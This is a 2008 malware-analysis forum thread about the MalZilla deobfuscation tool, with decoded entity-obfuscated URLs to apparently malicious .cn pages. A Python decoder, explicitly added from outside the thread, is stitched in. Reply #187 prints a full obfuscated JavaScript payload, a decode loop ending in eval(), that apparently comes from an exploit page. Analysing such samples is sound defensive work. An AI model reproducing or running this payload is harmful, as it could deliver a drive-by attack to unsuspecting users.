Author Topic: MalZilla  (Read 280475 times)


August 17, 2008, 09:12:59 am
Reply #180

brewt

  • Special Access
  • Newbie

  • Offline
  • *

  • 8
hmm, is there an easy way to decode these unicode html entities?
Code:
&#104&#116&#116&#112&#58&#47&#47&#111&#112&#97&#110&#97&#46&#99&#110&#47&#121&#97&#46&#104&#116&#109&#108

&#104&#116&#116&#112&#58&#47&#47&#111&#112&#97&#110&#97&#46&#99&#110&#47&#97&#108&#108&#46&#104&#116&#109&#108

August 17, 2008, 09:33:48 am
Reply #181

Orac

  • Special Members
  • Hero Member

  • Offline
  • *

  • 723
    • malwareremoval.com
hmm, is there an easy way to decode these unicode html entities?
Code:
&#104&#116&#116&#112&#58&#47&#47&#111&#112&#97&#110&#97&#46&#99&#110&#47&#121&#97&#46&#104&#116&#109&#108

&#104&#116&#116&#112&#58&#47&#47&#111&#112&#97&#110&#97&#46&#99&#110&#47&#97&#108&#108&#46&#104&#116&#109&#108

Decoded
Code:
http://opana.cn/ya.htmlhttp://opana.cn/all.html
This was decoded, using the "Enter decimal ASCII here." box available here
Malware analysed using clarified analyzer to record and document how malware behaves in a networking environment
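As an added worked example (my code, not part of the thread and not Malzilla's): a small Python decoder for the numeric character references in the question. The two entity strings from the post are used as the sample input; the decoder also accepts the hex form (&#x68) and, as in the sample, a missing trailing semicolon, which is what trips up people pasting these into a strict HTML parser.

```python
import re

# Sample input: the two entity strings from the question, one per line.
SAMPLE = (
    "&#104&#116&#116&#112&#58&#47&#47&#111&#112&#97&#110&#97&#46&#99&#110&#47&#121&#97&#46&#104&#116&#109&#108\n"
    "&#104&#116&#116&#112&#58&#47&#47&#111&#112&#97&#110&#97&#46&#99&#110&#47&#97&#108&#108&#46&#104&#116&#109&#108"
)

# &#NNN (decimal) or &#xHH (hex). The semicolon is optional because obfuscated
# pages routinely drop it and browsers decode the reference anyway.
_ENTITY_RE = re.compile(r"&#(?:[xX]([0-9a-fA-F]+)|([0-9]+));?")


def decode_numeric_entities(text: str) -> str:
    """Replace every numeric character reference in text with its character."""
    def repl(m):
        hex_digits, dec_digits = m.groups()
        code = int(hex_digits, 16) if hex_digits else int(dec_digits)
        if code > 0x10FFFF:
            # Not a valid code point; keep the raw entity so nothing is silently lost.
            return m.group(0)
        return chr(code)
    return _ENTITY_RE.sub(repl, text)


def extract_urls(text: str):
    """Decode first, then pull out anything that looks like an http(s) URL."""
    return re.findall(r"https?://[^\s\"'<>]+", decode_numeric_entities(text))


if __name__ == "__main__":
    print(decode_numeric_entities(SAMPLE))
    print(extract_urls(SAMPLE))
```

Python's html.unescape() gives the same result on this input (it also tolerates the missing semicolon); the hand-written version is useful when you want to keep out-of-range values visible rather than have them replaced. One caveat with semicolon-less references: a decimal reference immediately followed by a literal digit is ambiguous, so check the decoded output against the surrounding markup rather than trusting it blindly.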

August 17, 2008, 02:06:21 pm
Reply #182

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
In Malzilla, you can do that on Misc Decoders tab.

btw. hopefully, I will release Malzilla 1.0 today - it will have the most robust decoders ever (for unicode, hex, dec...)

August 17, 2008, 05:52:18 pm
Reply #183

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla

August 17, 2008, 08:50:29 pm
Reply #184

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Nice one dude :)
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

August 18, 2008, 08:33:42 am
Reply #185

Orac

  • Special Members
  • Hero Member

  • Offline
  • *

  • 723
    • malwareremoval.com
Thanks Bobby :)
Malware analysed using clarified analyzer to record and document how malware behaves in a networking environment

August 19, 2008, 12:27:53 am
Reply #186

tjs

  • Special Members
  • Sr. Member

  • Offline
  • *

  • 248
Congratulations!! This is great news!
Getting to v1.0 is a huge milestone! It's incredible how widely adopted this tool has become.

Keep up the fantastic work, Bobby!
TJS

September 01, 2008, 10:51:55 pm
Reply #187

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964
The following code gives Access Violations in Malzilla.

Code:
var uaigei=Array(63,0,0,0,0,0,0,0,0,0,0,0,0,0,0,46,44,21,55,40,22,1,53,39,38,0,0,0,0,0,0,20,42,0,37,3,54,15,4,36,11,12,59,10,32,58,9,19,16,25,26,28,51,48,24,7,49,56,0,0,0,0,0,0,5,8,52,14,17,2,27,18,43,47,13,41,45,30,31,29,50,57,33,35,6,23,62,61,60,34);var lszxla="osc5OV75aesD672vRks6uZHeur@eJeBhXs@eQkaPX4ceuZGPpY@@JpBPeYHaueYuFcaaW1YuR4euQM6GRyBQ@MsuoV6GSceGeHYDJesDhJqvbm2fSYChLYH5SeeuhJqvbm2fJaaPTm2e@V75aOMDWZMGtyGvXl@vBRceO4E5Js@vJR5Bu2VeBb7bosc5O1aaXY2eaOYbpma@hmaaupMSgYGhpYHRIkGPL72BX6B2Ls@vLa@BJ6M@@kfQFaBfg6M@pma@hmaaupMSgYGhpYHRIkGPL72BX2VfIBB2Ls@vLa@BJ6M@@e7bBx@Bb1aBh775QO75@Wc6AmaPb7aP9mcQJl@v6T@6I1Q6I1BB@lGhpl@Q6VGBhea2tBcP6MV5Bb2vg6C@geseXZuPpREhDYHhpaVfI@VeBQChb7Ch6aBPBba2@kfQFaBfg6M@pma@hmaaupMgJ7CRIkGPL72BX2VfIBB2Ls@vLa@BJ6M@@e7bBx@Bb1aBh775QO75@Wc60Y@v9mcQJl@v6TGB@lGhpl@Q6VGBhea2t1aPpY75XaV5BbYb@kqvbm2fgY@5aeYeJr2f4m75b62BIQVfa1BQRmQ6IB@eI@VfpYcfa1VQJmQ6IV@eI@VfLscfa1BPLmQ6IW@eI@Vful7fa1QRsmQ6I4vTI@VfoYcfa1Qg9mQ6I1aPI@Vfu7cfa1Q5JmQ6IB@vI@VfL2cfBbYbFY7eL7aQup@f0R@Bb6M@tyahgCVPSRGabpMSgYGhpYHRIkGPL72BI48hgmMBgY@5aOXucOVfp6cedpVgIbV5JC2eqm6pf1BPN6C5IbV5JC2eql6pf1Be9mcff1aPR2HTpQ8BI4@vI@VfIBVbosc5O4ahResSgYGhpYHR6M@6I4vQIbV5JC2eqY6pf1QeXM55R2GQIbV5JC2eqx6pf1QvBRceIBMGtyahgCVeaeYeT2@ehJqPXsGeJeYfzmuGRGeGpVY6JaaPIbYbFpGhGYGaJxahaaVfFlCeX1uvIbV5JC2eqm6pf1QPrs@v6aVPSRc60Y@vNC7ff1aPR2HTnQ8BIBGhaxEff1aPR2HTeQ8BIcGPgaVuB@VPXsGeJ6VfBbYbpma@hp@e@4E5Js@vJR5Bb2VfH6HhgmMBgY@5aOXGcOVfux@vXGXRIbV5JC2eqseucOVfx7vnIBMGX2c6uCaPXaVf0Y5oI@BPeYGvg2@6Fs@eSYGBhQ7bLs@vLa@BJ6M@pma@hp@e@4E5Js@vJR5Bb2VfHmMBgY@5aOXuWQ8BIQ5RgTQTHmMBgY@5aOXuRQ8BIcvormBBhT@eXW@5Jp@BIZugxmQ6JaaPTm2eayGhalaPBb62t4Ghpl@Q6VGBh775QO7eaesSgYGhpYHR6M@6IQEff1aPR2HTWM6pf1BRCmY6NYc5IbV5JC2eqsYucOVfgaXRIbV5JC2eqseucOVfx7vnIBMGX2c6uCaPXaVf0Y5oI@BPeYGvg2@6Fs@eSYGBhQ7bLs@vLa@BJ6M@pma@hp@e@TGPnCQTH25Wp725KYG5TYH5paBBhT@eXW@5Jp@BIZugxmQ6JaaPTm2eayGhalaPBb62t4Ghpl@Q6VGBhmaPpY75XCQuhQa2@e7bX2c6SYcekaVeT2@eBbYbgmGaX2c6gYH5RRceSYcSu7G@hJqvbm2feesSgYGhpYHR6M@6IMEff1aPR2HTW46pf1QgipMnpmMBgY@5aOXupQ8BIMGeIBMGtG76x625Je6uhJfP
os@e61Q@XQEff1aPR2HTWV6pf1BP@4sGepMRIbV5JC2eqsYXcOVfXaBBhG76wm7ff1aPR2HTWZ6pf1BP617hBbe@X4XhIbV5JC2eqsYucOVfxRcPIbV5JC2eqm6pf1BP6ycebeGPa16Bh4ahRpMn6mMBgY@5aOXXcOVfaY5@IbV5JC2eqr6pf1BvpY@BFpGhGYGBh1BBhJq5J7avgp@fWbYb@kqPTpHhp6HeXCBeksHh6BM@tyahgCBQ@HsGtyahgCQvbmCPJ7aaXYHvOME5gsG@61VSm6YXAY6Xo1MBgY@5aOvucOVfoV6SSQBuWc5uGBeGSMu6RHsSRcYgAm6G1lYXI@Vf4muGilugm7Eff1aPR2HTRQ8BIV9SnVu6pZ6gWQBGS1YuGc5X4m6uRy6unM6uo1Q6IHeuRyYgR4suIbV5JC2eqC6pf1QuRHeuGHeuRH66ACeuRQQuRHeuRHeuRHeupyYfa1QuRHYXjCsu4mMBgY@5aOvucOVfRHeuRQQuRHeuG45uRH66RHeuRHeuRHeuRcYXI@VfoVHugHsXRMcff1aPR2HTRQ8BIZYXocG6pVGPoQQGnBshGcHhWyGhQMePgyHhS1Q6IyeXWc6XW1YSIbV5JC2eqC6pf1VSQZeGGc6XWcu64CegeQVgAx5gjlsu1asuS4Efa1MXjYYSnyEXS1MBgY@5aOvucOVfjCYXjeQXS46uGG6Sgy66S46G1CsuAC6S1legI@VfRysXg46gRBYff1aPR2HTRQ8BIy5XAm66p4sheQQGSVeGGH6Gjl5gWcESRZYXo1Q6IysuQy9XgVYgIbV5JC2eqC6pf1BuimegGceGSM6646YgmeQGnceGpZYXe1euWHYfa1VS4C6ueV6GQ1MBgY@5aOvucOVfWcESSQQXpyGGGGsui766py6upVeXAaeXix5GI@VfmCsSRZegTyYff1aPR2HTRQ8BIZsSoB66p4YgWQVSpM5uG16XjY6SWMYg4muuQ1Q6IV5GAl9Sm7EgIbV5JC2eqC6pf1MS4meGGc6Go1G6iC6XRQVXACsXA6YXgcsXo1EfaTGva2GBhJzv66@eJaQvbmCPJ7CTBeXBhkqvbm2fbeYeT2@ehJfh@cHeLYaeJp@vX4c5Js@vJY5eJeGPX72BIWchDYHhpmBBhJfhX4aPps5vpmaQIY2vJaV5JC2eqseGcOVfblC5B7cfa1aPR2HTWG6pf1M5B7cGIbQvbmCPJ7CTBeXBhJfQFaBhBb2vg6C@osc5O1GaAmaPb7aP9aBha1Mn6mMBgY@5aOXXcOVfapBSRC2eBmMBgY@5aO3XcOVfp6HeXmBBhBcP61GBh6cP6Z9e6MGBB1aPpY75XCBuhQa2Ls@vLa@BJ6M@@e7bBOMBhJf2tQ7bBx@BG7GhLaBBBHM5TlHhJlC5@MsGtBcP6MM5TlHhJlC5Bb7bkRHhTeGPX776nmaQpY@BI@s5LmaQR72fascedYahdYGa!m9nLmaQR77a7m2pXmMBtZMnJ72fJ2GPGeePulGvGYceppMhgYGhpYGgaYGeJp@v61MeIrMBgY@5aOvXcOMDL77fBZMBI@357pcffJzDFpGhGYGaIbESQHeGTMeGXV@@JmMDf1Qpg23eIbVbdV@eJec6SY@v472vg6chT7aPO1BQkmQ6IV@eJecfdbVf7m2pXmMBtZBPaYGeX4aPps5vpmaQIY2vJCVfdbV5JC2eqseGcOMDblC5B7cfa1MDf1aPR2HTWG6pfZM5B7cGi7uGo4uXTysDf1aPR2HTRQ8Bdy6X4l66WMegRQBGe46SGHeuACeXjlEuQV9uo1MDf1Qpg23eIbVbd4XPpCMeIkGaJ2GPGpMSgYGhpYHRIkGPL72BI4vQdbV5JC2eqY6pfZQeXM55R2GQdbV5JC2eqx6pfZQvBRceI@VfIBMDf1Qpg23eIbVbI4XPpCVeSCaaumcQXTuhGYHnRsHhJaVuRBQpg23eIbVbd4XPpCQ5XeGaXl25XHXh
glaP8sGeJaVfN6aeIR@eXc2vFmBBdbVf7m2pXmMBtZQvGCaaNC2eB72BRpGeXHXhpa@6I@vpI@B6W@BuBZMBI@357pcffJzDRs@v6eevGC2BRBQfFHVf723fOyQfOcaeRaBuBHVDO1Qp7mMDf1Qpg23eIbVbIycebeGP@Hahpa@fFHVPXsGeJ2357pcffJzDSY@vOc25WC2P@4E5Js@vJREhDYHhpaVfH6HhgrMBgY@5aOXGcOMDux@vXGXRdbV5JC2eqseucOMDx7vnIBMDf1Qpg23eIbVbdBGQWYaapCa5R7c69CaPXaVf0Y5oI@BPeYGvg2@6RBMDf1Qpg23eIbVbIc25WC2PX4XPX7@BB@357pcffJqf9p@f1m75um2fKYH5TeGPOTuPe72pg23eIbVbIVHPS62QueevRs25kpV5Jl25upH5Jm9ek62pg23eIbVbd4XPpCBhLxa5Wm25@V@eJec6AmaPb7aP9mcQJl@v61MnLmCDf1aPR2HTWQ8BdcaQXrc6jrMBgY@5aO3ucOMDJlX@SrMBgY@5aO8ucOMDGREhdbV5JC2eq76pfZMhpmQ6I1BBdbVf7m2pXmMBt1MnJ72ff2@P@MHhosa5gC76AmaPb7aPxY@@pxuQaY@BFpGhGY@6Oc3nyYuB7m2pXmMBt1Qeu77@ueGaCYceiaBPdla@6RGB7m2pXmMBt1Vgum2fDe6uOc8eO@HepkCeG2357pcffJqfR2HQul2e@QuQkm5BJrH5QaHeaJ@6WBQpg23eIbVbIMahGC2ee7Ga4lChiaQ5aOHeS2GB7m2pXmMBt1MQa7c6wmaQpY@BAac56MahGC2ee7GBB@357pcffJqf8Y@@p2357pcffJqff2@PX45eulaP7m2pXmMBtZMnJ72fQ6@5pe6PaYGeX4E5Js@vJREhDYHhpaVfwl8hgrMBgY@5aOXucOMDppMn6rMBgY@5aOXXcOMDamQ6I1BBdbVf7m2pXmMBt1MRXCBggmCegCVnJlavGY@f8Y@@p2357pcffJqfQ6@5ppVnIbV5JC2eqs6GcOVfOycebeGPaMe6js5RNY5pg23eIbVbd@epu4Chg6@5ppsDBbYb@kqbBx@Bb4avLlGPSlaBhkfPeYGvg2GaTm2efZBGdbYbkRHhTeGPX776nmaQpY@Bd@seIkGPL72fL2GhSlaQkeYfL2H5B7cGTBegi75g4x66QM5GRQQXgM5XG15Ggc66Q19STHsSAssXgyuXIHBQkeYfpYH5pmVa2WMeIkGPL77adBMGtc75QO2vJl2vXc9enp@eus@Pj6@eJaBPeYGvg2@6ITV67232pe@5RHeuWTBPeYcfa1QuI@VfR1BBhcHeLYaeJp@vX@HeLs@vBRce@1BPeC2eu6@vSRQ@QTQ56CCaPYcepY75Be6uIb62Ls@vLa@BJ6M@@kf2tJqvbm2fXR@5@ZBGRZQ6XRHh@ZQuArQ6SlcP@ZVgdbYvbm2fSaGPa2HhuesDJVaXpVESJVCXTGYSJV2GilsSJVCuTZeXJV2uSZeGJVaXoyuXJVCXoGYSJV2uS1eudbVbdVBvS4YgTVBvpBsSQVBv475XWVBvmm9uSVBvRy9uoVBvWcYS1rMBdVBvSGYueVBvncYggZMBtZBDTluuRG6DTCegAmuDT7uSR46DTYESpH6DTlYS1xuDTr6Xmx9DfZBDTY6g1r6DTY6ge19DfJzDJV2uS1eXJV7Xoc5gJV2uAaYSJV2Gi7YSdbMDJVauAY6gJV2gmCsuJV2upGYSJV2uSGYSdbVbdVBvAlsSTVBvn1sXTVBvocEXAYBvoVEXjYBvocYu1YBvo4EXAYBvgV@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@HJqvbm2fumcQ@TGva2HGHJhvg6C@HJzeIkGakRHhTeGPX776LmaPb7aP12GPGYcepaVfumcQJl@vIBMGHJzeIkc6SY@v472vg6chT7aP61M
hasH5S6@PI@VfL2H5B7cG1l5XpcsSix66SV9X1eQXey6XG1uuAl66Rcugn16gjl6GilYgIBMGHJfQFaMeIkGBheqbosc5OQG@S775BpHP@V7eJlChbCaP642QJ2@eLRHBIVBvSZsuW1BBhQqbosc5OGchSeeueseuRHeuR@M5Slaa6mH5GGBeQl2vg6cedpQeJpHPpacBgbQueleGBb6OtyahgCQQIeeBRG2uLCshR4@uLeQQIlaBuGchSO6OtyahgCBeQxahge6vXYH5Ls@5JaVfJV7ffTHeLOVeulHBIVBvIbVeulHBXRHhBb6OtyahgCM5Se6eQxahgO6OtZ2QB2GP64C5X@GPXr@v6kVu24C5S6M5SOBaSlCGHJz5Ses5SpM5TmH5pmaQXr@BR@M5SlC6gBMGHJqvbm2fGeYeJr2f4m75b62BBb6OtyHegaBQ@HsGB2eQIO6QfbBBGOXQces5SOBeQl2vg6cedO6OtJaaHs@v6pMhJ6@e6He@R4@uLCshR4GBhQqbPeePulGvGYceppM5LmaQR7C5qC6pX4c5Js@vJl9eX775u2cnbpHPJaBBX@GPXr@v6O6OtQaOtQChb7Ch6aBPBba2HJf2HJfOtBcP6MM5TlHhJlC5Bb7bumcQ@cHeLYaeJp@vXZ75B7aP6ZQaBxc5beGPO475LeYfJa25aRGQplC6esYuIpQ56CCaueYuFcaaW1YuR4euQM6GRyBQ@MsuoV6GSceGeHYfOZaQk72Q@Hef6YGQda@v@HYa2WBQFmahGYcadBMGtQ7btQqbBx@Bb4avLlGPSlaBheqbosc5O1aPR2GaXYHvOME5gsG@61MhamQ6IQVfBb6Otc75QOaOtWchDeePulGvGYceppMhgYGhpYGgaYGeJp@v61MeIkGPL77fBb6OtWchDpM5J7aSp775BmGvpY@BgY@5aOvucOVfblC5B7cfa1aPR2HTRQ8BI4aQkkYujYeXgMEu1mMBgY@5aOXucOVf179SQQQXix9XGGsSis66eZsSQB6uQy9Xj6suIBMGHJqvbm2fG6C5pmaQXrGaTpGPSlGhRY@BSaGPa2HhuOMDJVCuS46udBMGHJqvbm2fG67vbm2f@HBvXYH5Ls@5JaVfJV7ffTHeLOVeulHBIVBvIbVeulHBXRHhBb6OtyahgCVhI2HeLO@f@HBeQxahgO6OtyahgCM5SCahLY@f@HVuRHMBOQG@S775BpHPX@GPXr@v6O6OtZ2QB2GPOGVhI2HeLOc6aYced72QO@efSl25blGPBHVhI2HeLO@ffQefIm@eulHQhQqbosc5OychaRHhfCBaO1chaRHhfpM5TmH5pmaQXr@BR@M5SCahLYGBhQqbosc5O1@eulHQOQefIm@eulHQX4avIl2vg6cedaQua1chaRHhfpQeJpHPpa@fGHM5SCahLYGBhQqbnaGQaY@f61@eulHQX@GPXr@v6CMBO4C5RsHhJCQaOHe@pHeuRH6BO1@eulHQOQefI2HeLO@ffHVhaRHhfCMBOychaRHhfO6OtyahgCBeJe@f@HVeJr2f4m75b62BBb6OtyHegCQBBeeuhHBQ2ceuRbefBOMBBHBeJeHTBeXaI2HeLOHBG6C5pmaQXrHGHJqvbm2fIY7POQefdZMGHJzv66@eJCQBIY7PX@GPXr@v6CQaO4YuBHVhTx@f@HVhTx@ffHBvXYH5Ls@5JaVfJ1MBXRHhBb6OtyahgCBeOQefdZMGHJfeOQefumcQX49eXlCeaYHGHJzeIkc6ARceSR@eJCBaO1GvFO6OtWchDpMSupH5u2GPOQefGO6OtQ@f@HMeIkc6ARceSR@eJO6OtWchDpMSupH5u2GPOQefIY7PhQqbumcQX49eXlCeaY@f@HBehQqb@lGhpl@Q6VGBheaOtQaOtQqbBx@Bb4avLlGPSlaBhkqvbm2fpsc5dY@vWQePulGvGYceppMhgYGhpYGgaYGeJp@v61MeIkGPL77fBbY
bpsc5dY@vWTM5J7aSp775BmGvpY@BI4@eblC5B7cfa1MhalaQkkegAYEujaYSWQBST1euGM6um766ey5gRQQuRc5uirsXSHYunZYfBbYbosc5OcahgrGPpm6akRHhTeGPX776LmaPb7aP12GPGYcepaVfumcQJl@vIBMGtcahgrGPpmY6SY@v472vg6chT7aP61MhasH5S6@PI@VfL2H5B7cGQc9uQ1YuSVu64Y5G1eBuWc5XGGYgml66RHegR19Xn4eugZsXIBMGtyahgCBeQl2vg6cede6vXYH5Ls@5JaM56Y@ealHefZBDTleuSMsDBbYbosc5OQG@osc5@V7eJlChbCaP61BDTmMBXR@5fTHeROVfJV7ffTHeROVeuCaBhJqvbm2fI6HPI2HeLOGaG67vbmCGtyahgCM5al25blGP@1eufQG@S775BpHPX@GPXr@v6OYbnaGQaY@BI6HPI2HeLOc6aYced72Q242eSCahLYGBI6HPI2HeLOHB@1GQdm@eulHQhJqvbm2fF6@eam@eulHQ@1GQdm@eulHQX4avIl2vg6cedaQua42eSCahLYGBhJqvbm2fI2HeLOGaI6HPI2HeLOc6SY7hS775BpHP6He6I6HPI2HeLOc6aYced72QG42eSCahLYGBhJzv66@eJaVhaRHhfpQeJpHPpaHBS2H5RsHhJ2eue7euRHeuB1@eulHQ@1@eulHQf1@eulHQfyGQa2chaRHhfOYbosc5OQGPGRc5QeYeJr2f4m75b62BBbYbFRc56GaaRbe@2GeuRbe@fbBBGYGeuma@qaap@1@eulHQfQG@S775BpHPhJqhTxcPJmaaI@v@RMcfhJfhk7@f@HVhTxcPJmCBIY7PFYc5f1GvFxGPgOVhTxcPJmCGtZ2QB2GP61GvFxGPgpQeJpHPpa@aTHeuRBVhTxcPJmCB@M@PkOYbpma@h7ahgrGPpsY6SYc5oYc5@1GvFxGPgOevbmCPJ7auXBceB7aQb2GQPY@BBbevbmCPJ7auX4aPX7@BBQChb7Ch6aBPBba2tc75QO2vbmCPJ77uX4aPgxaPgeYhTxcPJmCGpsc5dY@vgTV5JlGPBxaP6BMG@lGhpl@Q6VGBhe7b@kqbBx@Bb4avLlGPSlaBheqbosc5O1aPR2GaXYHvOME5gsG@61MhamQ6IQVfBb6Otc75QOaOtZaQXkaQReePulGvGYceppMhgYGhpYGgaYGeJp@v61MeIkGPL77fBb6OtZaQXkaQRpM5J7aSp775BmGvpY@BgY@5aOvucOVfblC5B7cfa1aPR2HTRQ8BI4aQkk6SRB6S1xeGjmMBgY@5aOXucOVfiseXmeQXSV5gG19XW466is5XW4YgR4eXQHeXIBMGHJqvbm2fG6C5pmaQXrGaTpGPSlGhRY@BSaGPa2HhuOMDJV7uR4eGdBMGHJqvbm2f6l2vus@PkmaaRG2uLCshR4@uLO6OtyahgCQQIlaQPYGaRG2XRHeuRHsGHJqvbm2fSCC5alaQPYGa6mH5BkaPGGBeQl2vg6cedpQeJpHPpacBgbQueleGBb6OtyahgCBeQxahge6vXYH5Ls@5JaVfJV7ffTHeROVeuCCBIVBvIbVeuCCBXR@5Bb6OtyahgCVhBrch@QG@osc5hQqbnaGQaY@BI6HPIpQeJpHPpacBg@s5Rl2eS6c@J6VhBrchfQYhBrchhQqbI6HPIeYhBrchX4avIl2vg6cedaQua425S2H5BkaPu16BhQqb6m@eulHQSeeB6l2vus@Pkma6RG2XRHeuRH6BuGchS6c@JO6OtyahgCBeJeHeg6aaXYHvOME5gsG@6BMGHJqPum2Bosc5OBGaRb6Q2GchaRHhflCGBOMBBQGPGRc5QOXQceYhBrchfQG@S775BpHPhQqbosc5OcaPS7aadZMGHJqPum2BBe6uhB@ag46uhBHBfBQvJl2vfQsD4rMGHJhvJl2vfQYf7a2uL2v@R4@peCsh7a2
uL2v@R4@peCsh7a2uLmMGHJhvg6C@n6ceP6@5X4E5Js@vJpuPnx9ea7GPgxE5uecRbeGP6caPS7aB@lGhpl@Q6VGBheaOtQChb7Ch6aBPBba2HJf2HJfOtBcP6MM5TlHhJlC5Bb7bosc5O1aPR2GaXYHvOME5gsG@61QvBmQ6I1cQIBMGtc75QO7bosc5OcaPS7aaJxahaaVfXYHvOM9hIbV5JC2eqC6pf1VvJa8RIbV5JC2eqs6pf1BPL72BdMXvBlHQx6GeJpBnT6Hhf7XQGYHDB1BBhJqvbm2fG6C5pmaQXrGaTpGPSlGhRY@BSaGPa2HhuOMDJV7uR4sXdBMGtyahgCQQS7Ceb7@PgeeueCshR4@uLCshhJqvbm2f6mH5BkaP@He@pHeuRHeuhJqvbm2fSCC5alaQPYGa6mH5BkaPGGBeQl2vg6cedpQeJpHPpacBgbQueleGBbYbosc5OQG@osc5@V7eJlChbCaP61BDTmMBXR@5fTHeROVfJV7ffTHeROVeuCaBhJqvbm2fI6HPIe6eQxahgOYbnaGQaY@BI6HPIpQeJpHPpacBg@s5Rl2eS6c@J6VhBrchfQYhBrchhJhQI2HeLOH5@GQQS7Ceb7@PgeQue7euRHeuRBM66mH5BkaPhJqhBrch@1GQdmc6SY7hS775BpHP6He6SCC5alaQPYH6gBMGtyahgCBeJeHeg6aaXYHvOME5gsG@6BMGtyHegaVvbm2fBeeuhB@a6m@eulHQSO6QfbBBGYGeuma@q6Gp@1GQdmHBG6C5pmaQXrHGtcHeLYaeJp@vXZ75B7aP6ZQaumcQJl@vO45R4l8nM7uaI4@eS6@PPHYuixEuTcuXGGsSWZ66p1EuSQVSAaeuGc9upGeG4m5gmlEXimVa2HahgsGeOTGhGYGaI475LmQfos@eTYGaIV@@R2HeB7C5uGCXIpQ56C7fv@e5bmahGCVebeGP@1BhT7CeR2GhQmQfos@eTYGaIc75TYcfv@e5bmahGCVebeGP@1QeuR@5IHVvb2GvJeYfFs@eSYcfv@e5bmahGCVebeGP@1Mhup@vgR@eaYc5IHVvb2GvJeYfpmavJmVa2WMeIkGPL77adBMG@kzhb7Ch6aBPBba2tQ7btBcP6MM5TlHhJlC5Bb7bpma@hkqvbm2fumcQ@cHeLYaeJp@vX4c5Js@vJY5eJeGPX72BIWchDYHhpmBBhJzeIkc6SY@v472vg6chT7aP61MhasH5S6@PI@VfL2H5B7cGWHeun1sS1lu6e49SWQBuWcuuGBeGoVu6RH6SR4uGTVYSp16gIBMGtyahgCQQS7Ceb7@PgeeueC6XRVeuTH6XhJqvbm2fG6C5pmaQXrGaTpGPSlGhRY@BSaGPa2HhuOMDJV7uR4sudBMGtyahgCQQIlaQPYGaRG2XRHeuRHsGtyahgCQ5alaQPYGaG6C5pmaQXrc6aYced72QD1sGtyahgCM5Rl2eS6c@JeeQIlaQPYG66H2eS6c@JOQueleGBbYbosc5OQG@osc5@V7eJlChbCaP61BDTmMBXR@5fTHeROVfJV7ffTHeROVeuCaBhJqvbm2fSCC5ae6eQxahgOYbnaGQaY@BSCC5apQeJpHPpacBg@s5Rl2eS6c@J6M5Rl2efQs5Rl2ehJqvbm2fSCC5aes5Rl2eX4avIl2vg6cedaQua425S2H5BkaPu16BhJhQI2HeLOH5@GQQS7Ceb7@PgeQue7euRHeuRBM66mH5BkaPhJqvbm2fGYGeuma@@TGPnCBSgmahQaBBhJqPum2BBeeuhB@a6m@eulHQSO6QfbBBGYGeuma@q6Gp@425S2HBG6C5pmaQXrHGtyahgCM5Sm2v@ZQfGY@v6R@P@1MDhJqPum2BBeeuhB@aWHeXSZsGBOMBB4C5g7CB@ZVDLG2uTH6XhZMGtcHeLYaeJp@vXZ75B7aP6ZQa67aeaCQ@G2ceSkYv@1BvgpcGSl@QJeGhSeBeBlc5ulC
eF7a6LRGePyaeamVa2WchDYHhpCBQkeYf!e5RKYcekYc5IHMhasH5S6@P@1MSClXWmk6uRHsXg4ugAeQGAluuGM6ums66QGYX1eQuRM5uA66XT15XgVEfv@s6umcQJl@vv@s5p62eJpYv723GDb7hJaGho6Hegk6vg2@BLyXRCmXPX7GPg6MG@2s6S7a@aYca2y7GgYHhpCM5p62eJeYfn6@PpacGW1euR7CG6YGQda@vPGeuR77fOyGQa2Hhu2HegeYfgY@PITeaokYPB2@edbM5Sm2vfZVfv@s6okY5Jl@vv@s6okYPB2@evZBBhJf2Ls@vLa@BJ6M@@kf2tJfQFaBfSYChLYH5S6M@tyahgCV5JC2e@TGPnCBSgmahQaVfJmcfa1BQJmQ6IW@eI@VfLRcfa1BPpmQ6I@GQIBMGtc75QO7bosc5OZ7vF6GaIZ3ff1aPR2HTRQ8BIy3ff1aPR2HTWQ8BIZ7gIbV5JC2eqm6pf1QPJmaWIbV5JC2eql6pf1VeXZ3ff1aPR2HTRQ8BIy3ff1aPR2HTWQ8BIZ7gIbV5JC2eqm6pf1QPJmaWIbV5JC2eql6pf1VeXMYfhJqvbm2fnx7PBRGaXYHvOM9hp6cvJa8RIkGPL72Bnx7PB6MGtyahgCBeQl2vg6cedesDJVCDfTHeROVeuCCBSaGPa2HhuOMDJV7uR4YudbYbnaGQaY@BG6C5pmaQXrc6aYced72Q24eun16BG6C5pmaQXrHB@1BDTmMBXRHhfTHeLOYbG6C5pmaQXrGaTpGPSlGhRY@BG6C5pmaQXrGBhJqvbm2fG67vbmaaTpGPSlGhRY@BIVBvIbVeulHBXRHhBbYbosc5O1GQdmGaG67vbmCGtZ2QB2GP61GQdmc6aYced72Q2QeueseuRHeuRBVhBrchfQYhBrchhJqvbm2fGYGeuma@@TGPnCBSgmahQaBBhJqPum2Bosc5OBGaRb6Q2MYuRb6QfbBBGYGeuma@q6Gp@1GQdmc6SY7hS775BpHP6He6RGauRHeuRH66G6C5pmaQXrc6aYced72QBbBeQl2vg6cedOYbFRc56yahgCBQ@HsGB26uR1eXhBHBfBM@tyahgCMvoxGQueYeJr2f4l@vBxaPYREhDYHhpaMvoxGQBbYbJxahaaVfpma@hr7vF6HeX47ff1aPR2HTpQ8BI43ff1aPR2HTTQ8BI4GP6He@nycPFxcPFY@6R@Qua1eugM6uoMeueBMG@lGhpl@Q6VGBhe7fBbYbosc5OZ7vF6He@TGPnCBSL7aQoY@T9mcQJl@v6Z7vF6GBhJf2tQChb7Ch6aBPBba2tQ7btB";var vibqt=13886,uwchr,pxhy,gyyqwo='',hgkmmtap=xlkxqsz=ruleddw=0;for(pxhy=14;pxhy>0;pxhy--){for(uwchr=Math.min(vibqt,1024);uwchr>0;uwchr--,vibqt--){eval('ruleddw|=(uaigei[lszxla.charC'+'odeAt(hgkmmtap++)-33])<<xlkxqsz;');if(xlkxqsz){gyyqwo+=eval('String.fromCha'+'rCode(41^ruleddw&255)');ruleddw>>=8;xlkxqsz-=2}else xlkxqsz=6;}}eval(gyyqwo);


September 01, 2008, 11:03:25 pm
Reply #188

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
